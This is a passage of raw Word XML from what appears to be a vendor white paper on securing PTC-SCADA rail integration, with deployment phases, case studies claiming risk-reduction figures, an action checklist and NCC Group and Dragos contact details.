        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Patch critical systems</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000293">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Risk Reduction</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">: 40%</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000294">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_5zx25arhhkq3" w:id="44"/>
      <w:bookmarkEnd w:id="44"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Phase 3: Platform Deployment (Days 31-60)</w:t>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Full Dragos rollout</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000296">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Advanced analytics enabled</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000297">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Safety validation completed</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000298">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Risk Reduction</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">: 70%</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000299">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_80uwyejuf62t" w:id="45"/>
      <w:bookmarkEnd w:id="45"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Phase 4: Operational Excellence (Days 61-90)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000029A">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">24/7 monitoring active</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000029B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Playbooks operational</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000029C">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Team fully trained</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000029D">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Risk Reduction</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">: 94%</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rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_gh2zzbmda3uz" w:id="46"/>
      <w:bookmarkEnd w:id="46"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Success Stories</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000002A1">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_mmoqohstsy6s" w:id="47"/>
      <w:bookmarkEnd w:id="47"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Case Study 1: Major Freight Railroad</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000002A2">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Challenge</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">: Integrated PTC-SCADA across 15,000 miles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b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Solution</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>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numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Week 1-2: Emergency assessment found 347 critical paths</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000002A7">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Week 3-4: Rapid segmentation implemented</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000002A8">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Week 5-8: Dragos platform deployed</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000002A9">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Week 9-12: Full operational capability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rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Results</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>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numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Zero safety incidents during implementation</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000002AE">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">94% risk reduction achieved</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000002AF">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">$340M liability exposure eliminated</w:t>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Federal recognition for leadership</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000002B1">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_unzbd96zucy9" w:id="48"/>
      <w:bookmarkEnd w:id="48"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Case Study 2: Regional Transit Authority</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000002B2">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Situation</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">: Legacy integration, dense urban environment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rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Approach</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserv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numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Phased implementation during maintenance windows</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000002B7">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Zero disruption to passenger service</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000002B8">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Real-time safety validation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b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Outcome</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>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numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">SIL-4 maintained throughout</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000002BD">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Insurance premiums reduced 45%</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000002BE">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Model for other transit systems</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000002BF">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">$127M in risk mitigation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rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_8hh4wzqa6m07" w:id="49"/>
      <w:bookmarkEnd w:id="49"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Taking Action</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000002C3">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_jll9xbbrrwez" w:id="50"/>
      <w:bookmarkEnd w:id="50"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Your 24-Hour Checklist</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000002C4">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_keqrmwdn20ek" w:id="51"/>
      <w:bookmarkEnd w:id="51"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Immediate (Next 24 Hours):</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000002C5">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">☐ Convene emergency response team ☐ Isolate PTC-SCADA connections ☐ Contact tri-partner team ☐ Brief executive leadership ☐ Initiate funding approval</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000002C6">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_xb1dd3csl2z7" w:id="52"/>
      <w:bookmarkEnd w:id="52"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Urgent (Next 72 Hours):</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000002C7">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">☐ Complete integration inventory ☐ Deploy monitoring capability ☐ Establish federal coordination ☐ Begin threat hunting ☐ Document current state</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000002C8">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_qx3dchacoq0d" w:id="53"/>
      <w:bookmarkEnd w:id="53"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Critical (Next 7 Days):</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000002C9">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">☐ Approve implementation plan ☐ Allocate resources ☐ Start segmentation ☐ Train response team ☐ Test manual overrides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rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_9w7dukl18tcb" w:id="54"/>
      <w:bookmarkEnd w:id="54"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Call to Action</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000002CD">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_4qz6ama6s0p0" w:id="55"/>
      <w:bookmarkEnd w:id="55"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">The Clock Is Ticking</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000002CE">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Every day your PTC-SCADA integration remains unsecured is another day adversaries can turn your safety systems into weapons. The architectural flaws are known. The exploits are proven. The attacks are beginning.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000002CF">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_4z9iwjqv36xw" w:id="56"/>
      <w:bookmarkEnd w:id="56"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Contact Your Defense Team Now</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000002D0">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">NCC Group OTCE</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1"/>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ptc-emergency@nccgroup.com</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000002D3">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Phone: 1-800-PTC-SAFE</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000002D4">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Secure: </w:t>
      </w:r>
      <w:hyperlink r:id="rId8">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:color w:val="1155cc"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">https://nccgroup.com/ptc-defense</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000002D5">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Lead: Dr. Sarah Mitchell, Rail Practice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b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Dragos Industrial Security</w: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numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>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rail@dragos.com</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000002DA">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Phone: 1-877-3DRAGOS</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000002DB">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Portal: </w:t>
      </w:r>
      <w:hyperlink r:id="rId10">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:color w:val="1155cc"/>
